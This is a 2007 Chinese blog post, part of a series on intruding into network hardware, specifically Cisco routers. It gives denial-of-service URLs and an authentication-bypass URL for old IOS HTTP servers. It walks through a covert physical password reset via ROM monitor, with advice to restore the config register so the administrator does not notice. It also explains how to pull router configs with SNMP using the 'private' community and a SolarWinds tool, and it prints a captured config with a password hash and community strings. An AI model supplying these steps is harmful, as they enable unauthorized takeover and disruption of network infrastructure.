数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



让硬件入侵不再是神话(二)
樱木花盗 发表于 2007-11-27 11:34:34

http://<router-ip>/%%

这种请求导致路由停止响应,甚至引起路由器执行硬重置(hard reset)

2.基于HTTP服务器查询的漏洞

Cisco 安全建议小组在20001030日公布了这个漏洞。IOS 11.0引入通过Web方式管理路由。”?”是HTML规范中定义的CGI参数的分界符。它也被IOS命令行接口解释成请求帮助。在IOS 12.0中,当问号邻接于”/”,URL解释器就不能正确解释其含义。当一个包括”?/”的URL对路由器HTTP服务器进行请求,并且提供一个有效的启用口令,则路由器进入死循环。因而引起路由崩溃并重起。

如果http起用,浏览 http://route_ip_addr/anytest?/

并且提供特权口令,则可以导致DoS攻击,导致路由停机或者重启。 除了让路由死亡之外,Http额外提供了一种可怕权限提升的漏洞,如下所论。

3.Cisco IOS 认证漏洞

  当HTTP服务器启用并且使用本地用户认证方式。在某些条件,可以绕过认证并执行设备上的任何命令。用户可以对设备完全的控制。所有命令都将以最高特权执行(level 15)

使用username password的路由设备帐户认证方式,构造如下URL

http://router_ip_addr/level/xx/exec/….

(注:xx代表1699之间的84种不同的组合攻击,因为路由器硬件类型众多,而IOS版本也存在不同,因此针对不同的路由器类型,攻击组合数字不同。)

通过这种方式,攻击者可以完全控制路由并可以改变路由表配置。这种可怕的事实让网管也感到惊悸。这种完整的控制方式将是网站数据通信枢纽的致命一击。 虽然Http漏洞带来如此之多的漏洞,但这种漏洞最主要原因是因为启用http服务器管理路由的缘故,由于这种管理是种命令行方式的替代物,因此对于熟练的网管来说,没有必要启动这种危害性很大的服务。

#no ip http server 的路由配置也成为时髦的安全配置语句。

2)常见入侵方法

########本地密码劫持

 在所有入侵中,这种类型的入侵活动可谓是蓄谋以久的野蛮做法。方法本来的意图是用于管理员忘记密码后的恢复措施。而技术做为双刃剑的一面,便在于我们如何使用它。

 如果你有一台笔记本电脑,你有一根与路由器相应类型的连接线,那么你配备了入侵路由的武器。剩下的时间,你将思考如何闭开网管的眼睛,把连接线与路由器连接。以后的动作,需要你行动迅速了。(25xx系列路由为例)

1.切断路由器的电源。

2.连接计算机与路由器。

3.打开超级终端(CTL-Break in Hyperterm)

4.在启动路由器的30秒时间内,迅速按CTL-Break组合键,使路由器进入rom monitor 状态,出现提示符如下:

Followed by a '>' prompt...

5.输入 O/R 0x2142,修改配置注册器(config register)路由器从Flash

memory引导。

6.输入I,路由器初始化设置后重新启动。

7.输入系统配置 对话提示符敲no,一直等提示信息显示: Press RETURN to get started

8.输入enable 命令,出现Router# 提示符。

这是,我们可以完全使用show命令查看路由中的一切配置,并可转储到计算机上。如果使用了enable的加密方式,虽然现在无法看,但可以使用工具进行破解。当然,粗鲁的做法是直接修改:

Router#conf term   ---à>配置终端

Router(conf)#enable password 7 123pwd  ----à>配置enable密码

 

 

进行完以上*作,别忘了恢复路由的正常状态,否则网管很快就能发现问题所在:

Router(conf)#c onfig-register 0x2102   ---à>>>配置寄存器值0x2102

Router(conf)#exit    ----à>退出

 ########获取cisco配置文件

   众所周知,cisco有个配置文件,这个文件可以说是路由工作的核心,让路由知到该干嘛?

怎么干?如果你有了这个文件,我可以说你成功了80%。怎么才能得到这个文件了呢,方法很多了

1 通过SNMP得道,这样是最常用的,我想用过SNMP的人会知道怎么做了,就不多说了!

2 攻击TFTP服务器,要得到的就是CISCO配制文件的存取权限

3 监视发往CISCO TAC的邮件(也是CISCO技术助理中心)

因为一般路由出了问题,都要求发出配置文件的。。。

4 还有很多方法,我记的以前黑白也有这么一篇文章,不过我不暂成大家用那种方法,太危险了!!!如果要知道的,可以和我联系。

5 还有很办法,那包括社会工程学。

   上面只是一些思路,具体过程我这里不赘述了。下面就具体阐述solarwinds2001得到CISCO密码过程。

   solarwinds2001是个集多种功能于一身的cisco管理工具,界面友好。工具条如下图5所示,酷似QQ,清晰明了,如图5

5solarwinds2001界面图

6、设置关键字private

打开Cisco Tools/IP Network Browser,设置关键字如图6,界面设置如图7

7cisco network browser

  随便,在图7中填入一段IP地址进行扫描,扫描后,如果发现cisco路由器,会显示如下图8

 

8、扫描到了cisco路由器

现在我们可以用Cisco Tools/Download Config来下载这台cisco路由器的配置文件。如图9所示:

9、下载配置文件

   好了。现在可以利用Cisco Tools/Config Editor&viewer打开下载好的config文件,如下是我下载的一份配置文件(部分略去):

!#show running-config    ---à>>配置环境
version 11.2      ---
à>>> IOS版本
no service pad  
no service udp-small-servers
no service tcp-small-servers
!
hostname HGHLNDSWSTWD.07.IDF1A.DSW08 ---
à>>>配置主机名
!
enable secret 5 $1$ukn/$LU0yrd7/YBqBNJRDlIVes.--->>>>
配置enable secet 密码(加密过)
!
!
ip subnet-zero  --
à>>0子网

!
!
interface VLAN1
ip address ***.11.111.8 255.255.255.192   ----
à>>配置ip地址
no ip route-cache    ----
à>无路由缓存
!
interface FastEthernet0/1     -----
à>以下配置e0/1接口
description Port connected to Apt# 7307
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/2      ---
à>以下配置e0/2接口
description Port connected to Apt# 7308
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/3        --
à>>以下配置e0/3接口
description Port connected to Apt# 7309
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/4    --
à>>以下配置e0/4接口
description Port connected to Apt# 7310
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/5     --
à>>以下配置e0/5接口
description Port connected to Apt# 7311
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/6      --
à>>以下配置e0/5接口
description Port connected to Apt# 7337
port security max-mac-count 1
no port security action trap
。。。。。。。。。。。略去
ip default-gateway ***.11.111.*    ------
à配置默认网关
mac-address-table secure 0001.0235.5a4e FastEthernet0/2 vlan 1
snmp-server community N3tw0rk RO    ---
à>snmp社区N3tw0rk
snmp-server community private RW     --
àsnmp社区private(重要)

snmp-server community public RO      --

阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.